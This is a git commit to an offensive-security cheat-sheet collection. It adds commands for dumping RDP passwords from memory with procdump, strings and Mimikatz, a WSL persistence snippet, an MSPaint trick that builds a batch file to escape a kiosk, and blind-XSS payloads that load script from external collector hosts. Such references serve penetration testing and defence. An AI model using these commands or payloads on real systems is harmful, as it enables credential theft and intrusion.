WSL + RDP Passwords + MSPaint Escape

This commit is contained in:
Swissky 2023-02-11 17:49:55 +01:00
parent ccae5a6e09
commit 14cc88371d
5 changed files with 72 additions and 15 deletions

View file

@ -4186,3 +4186,5 @@ CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 31d6cfe0d16ae
* [Practical guide for Golden SAML - Practical guide step by step to create golden SAML](https://nodauf.dev/p/practical-guide-for-golden-saml/) * [Practical guide for Golden SAML - Practical guide step by step to create golden SAML](https://nodauf.dev/p/practical-guide-for-golden-saml/)
* [Relaying to AD Certificate Services over RPC - NOVEMBER 16, 2022 - SYLVAIN HEINIGER](https://blog.compass-security.com/2022/11/relaying-to-ad-certificate-services-over-rpc/) * [Relaying to AD Certificate Services over RPC - NOVEMBER 16, 2022 - SYLVAIN HEINIGER](https://blog.compass-security.com/2022/11/relaying-to-ad-certificate-services-over-rpc/)
* [I AM AD FS AND SO CAN YOU - Douglas Bienstock & Austin Baker - Mandiant](https://troopers.de/downloads/troopers19/TROOPERS19_AD_AD_FS.pdf) * [I AM AD FS AND SO CAN YOU - Douglas Bienstock & Austin Baker - Mandiant](https://troopers.de/downloads/troopers19/TROOPERS19_AD_AD_FS.pdf)
* [Hunt for the gMSA secrets - Dr Nestori Syynimaa (@DrAzureAD) - August 29, 2022](https://aadinternals.com/post/gmsa/)
* [Relaying NTLM Authentication from SCCM Clients - Chris Thompson - Jun 30, 2022](https://posts.specterops.io/relaying-ntlm-authentication-from-sccm-clients-7dccb8f92867)

View file

@ -26,15 +26,17 @@
* **Hyperlink**: `file:///c:/Windows/System32/cmd.exe` * **Hyperlink**: `file:///c:/Windows/System32/cmd.exe`
* **Task Manager**: `File` > `New Task (Run...)` > `cmd` * **Task Manager**: `File` > `New Task (Run...)` > `cmd`
* **MSPAINT.exe** * **MSPAINT.exe**
* Open MSPaint.exe and set the canvas size to: Width=6 and Height=1 pixels * Open MSPaint.exe and set the canvas size to: `Width=6` and `Height=1` pixels
* Zoom in to make the following tasks easier * Zoom in to make the following tasks easier
* Using the colour picker, set pixels values to (from left to right): * Using the colour picker, set pixels values to (from left to right):
* 1st: R: 10, G: 0, B: 0 ```ps1
* 2nd: R: 13, G: 10, B: 13 1st: R: 10, G: 0, B: 0
* 3rd: R: 100, G: 109, B: 99 2nd: R: 13, G: 10, B: 13
* 4th: R: 120, G: 101, B: 46 3rd: R: 100, G: 109, B: 99
* 5th: R: 0, G: 0, B: 101 4th: R: 120, G: 101, B: 46
* 6th: R: 0, G: 0, B: 0 5th: R: 0, G: 0, B: 101
6th: R: 0, G: 0, B: 0
```
* Save it as 24-bit Bitmap (*.bmp;*.dib) * Save it as 24-bit Bitmap (*.bmp;*.dib)
* Change its extension from bmp to bat and run * Change its extension from bmp to bat and run
@ -147,3 +149,4 @@ firefox irc://127.0.0.1 -P "Test"
* [Breaking Out! of Applications Deployed via Terminal Services, Citrix, and Kiosks - Scott Sutherland - May 22nd, 2013](https://blog.netspi.com/breaking-out-of-applications-deployed-via-terminal-services-citrix-and-kiosks/) * [Breaking Out! of Applications Deployed via Terminal Services, Citrix, and Kiosks - Scott Sutherland - May 22nd, 2013](https://blog.netspi.com/breaking-out-of-applications-deployed-via-terminal-services-citrix-and-kiosks/)
* [Escaping from KIOSKs - HackTricks](https://book.hacktricks.xyz/physical-attacks/escaping-from-gui-applications) * [Escaping from KIOSKs - HackTricks](https://book.hacktricks.xyz/physical-attacks/escaping-from-gui-applications)
* [Breaking out of Windows Kiosks using only Microsoft Edge - Firat Acar - May 24, 2022](https://blog.nviso.eu/2022/05/24/breaking-out-of-windows-kiosks-using-only-microsoft-edge/) * [Breaking out of Windows Kiosks using only Microsoft Edge - Firat Acar - May 24, 2022](https://blog.nviso.eu/2022/05/24/breaking-out-of-windows-kiosks-using-only-microsoft-edge/)
* [HOW TO LAUNCH COMMAND PROMPT AND POWERSHELL FROM MS PAINT - 2022-05-14 - Rickard](https://tzusec.com/how-to-launch-command-prompt-and-powershell-from-ms-paint/)

View file

@ -9,7 +9,8 @@
* [Pass The Hash](#pass-the-hash) * [Pass The Hash](#pass-the-hash)
* [Golden ticket](#golden-ticket) * [Golden ticket](#golden-ticket)
* [Skeleton key](#skeleton-key) * [Skeleton key](#skeleton-key)
* [RDP session takeover](#rdp-session-takeover) * [RDP Session Takeover](#rdp-session-takeover)
* [RDP Passwords](#rdp-passwords)
* [Credential Manager & DPAPI](#credential-manager--dpapi) * [Credential Manager & DPAPI](#credential-manager--dpapi)
* [Chrome Cookies & Credential](#chrome-cookies--credential) * [Chrome Cookies & Credential](#chrome-cookies--credential)
* [Task Scheduled credentials](#task-scheduled-credentials) * [Task Scheduled credentials](#task-scheduled-credentials)
@ -168,7 +169,7 @@ net use p: \\WIN-PTELU2U07KG\admin$ /user:john mimikatz
rdesktop 10.0.0.2:3389 -u test -p mimikatz -d pentestlab rdesktop 10.0.0.2:3389 -u test -p mimikatz -d pentestlab
``` ```
## RDP session takeover ## RDP Session Takeover
Use `ts::multirdp` to patch the RDP service to allow more than two users. Use `ts::multirdp` to patch the RDP service to allow more than two users.
@ -195,6 +196,34 @@ create sesshijack binpath= "cmd.exe /k tscon 1 /dest:rdp-tcp#55"
net start sesshijack net start sesshijack
``` ```
## RDP Passwords
Verify if the service is running:
```ps1
sc queryex termservice
tasklist /M:rdpcorets.dll
netstat -nob | Select-String TermService -Context 1
```
* Extract passwords manually
```ps1
procdump64.exe -ma 988 -accepteula C:\svchost.dmp
strings -el svchost* | grep Password123 -C3
```
* Extract passwords using Mimikatz
```ps1
privilege::debug
ts::logonpasswords
```
## Credential Manager & DPAPI ## Credential Manager & DPAPI
@ -286,3 +315,4 @@ More information can be grabbed from the Memory with :
- [Unofficial Guide to Mimikatz & Command Reference](https://adsecurity.org/?page_id=1821) - [Unofficial Guide to Mimikatz & Command Reference](https://adsecurity.org/?page_id=1821)
- [Skeleton Key](https://pentestlab.blog/2018/04/10/skeleton-key/) - [Skeleton Key](https://pentestlab.blog/2018/04/10/skeleton-key/)
- [Reversing Wdigest configuration in Windows Server 2012 R2 and Windows Server 2016 - 5TH DECEMBER 2017 - ACOUCH](https://www.adamcouch.co.uk/reversing-wdigest-configuration-in-windows-server-2012-r2-and-windows-server-2016/) - [Reversing Wdigest configuration in Windows Server 2012 R2 and Windows Server 2016 - 5TH DECEMBER 2017 - ACOUCH](https://www.adamcouch.co.uk/reversing-wdigest-configuration-in-windows-server-2012-r2-and-windows-server-2016/)
- [Dumping RDP Credentials - MAY 24, 2021](https://pentestlab.blog/2021/05/24/dumping-rdp-credentials/)

View file

@ -33,6 +33,7 @@
* [Remote Desktop Services Shadowing](#remote-desktop-services-shadowing) * [Remote Desktop Services Shadowing](#remote-desktop-services-shadowing)
* [Skeleton Key](#skeleton-key) * [Skeleton Key](#skeleton-key)
* [Virtual Machines](#virtual-machines) * [Virtual Machines](#virtual-machines)
* [Windows Subsystem for Linux](#windows-subsystem-for-linux)
* [Domain](#domain) * [Domain](#domain)
* [Golden Certificate](#golden-certificate) * [Golden Certificate](#golden-certificate)
* [Golden Ticket](#golden-ticket) * [Golden Ticket](#golden-ticket)
@ -539,6 +540,22 @@ sudo mkdir /mnt/c
sudo mount -t vboxsf shadow_c /mnt/c sudo mount -t vboxsf shadow_c /mnt/c
``` ```
### Windows Subsystem for Linux
```ps1
# List and install online packages
wsl --list --online
wsl --install -d kali-linux
# Use a local package
wsl --set-default-version 2
curl.exe --insecure -L -o debian.appx https://aka.ms/wsl-debian-gnulinux
Add-AppxPackage .\debian.appx
# Run the machine as root
wsl kali-linux --user root
```
## Domain ## Domain

View file

@ -510,13 +510,18 @@ document.getElementById('btn').onclick = function(e){
### XSS Hunter ### XSS Hunter
XSS Hunter is deprecated, it was available at [https://xsshunter.com/app](https://xsshunter.com/app). You can set up an alternative version from [mandatoryprogrammer/xsshunter-express](https://github.com/mandatoryprogrammer/xsshunter-express)
> XSS Hunter allows you to find all kinds of cross-site scripting vulnerabilities, including the often-missed blind XSS. The service works by hosting specialized XSS probes which, upon firing, scan the page and send information about the vulnerable page to the XSS Hunter service. > XSS Hunter allows you to find all kinds of cross-site scripting vulnerabilities, including the often-missed blind XSS. The service works by hosting specialized XSS probes which, upon firing, scan the page and send information about the vulnerable page to the XSS Hunter service.
XSS Hunter is deprecated, it was available at [https://xsshunter.com/app](https://xsshunter.com/app).
You can set up an alternative version
* Self-hosted version from [mandatoryprogrammer/xsshunter-express](https://github.com/mandatoryprogrammer/xsshunter-express)
* Hosted on [xsshunter.trufflesecurity.com](https://xsshunter.trufflesecurity.com/)
```xml ```xml
"><script src=//<your.subdomain>.xss.ht></script> "><script src="https://js.rip/<custom.name>"></script>
<script>$.getScript("//<your.subdomain>.xss.ht")</script> "><script src=//<custom.subdomain>.xss.ht></script>
<script>$.getScript("//<custom.subdomain>.xss.ht")</script>
``` ```
### Other Blind XSS tools ### Other Blind XSS tools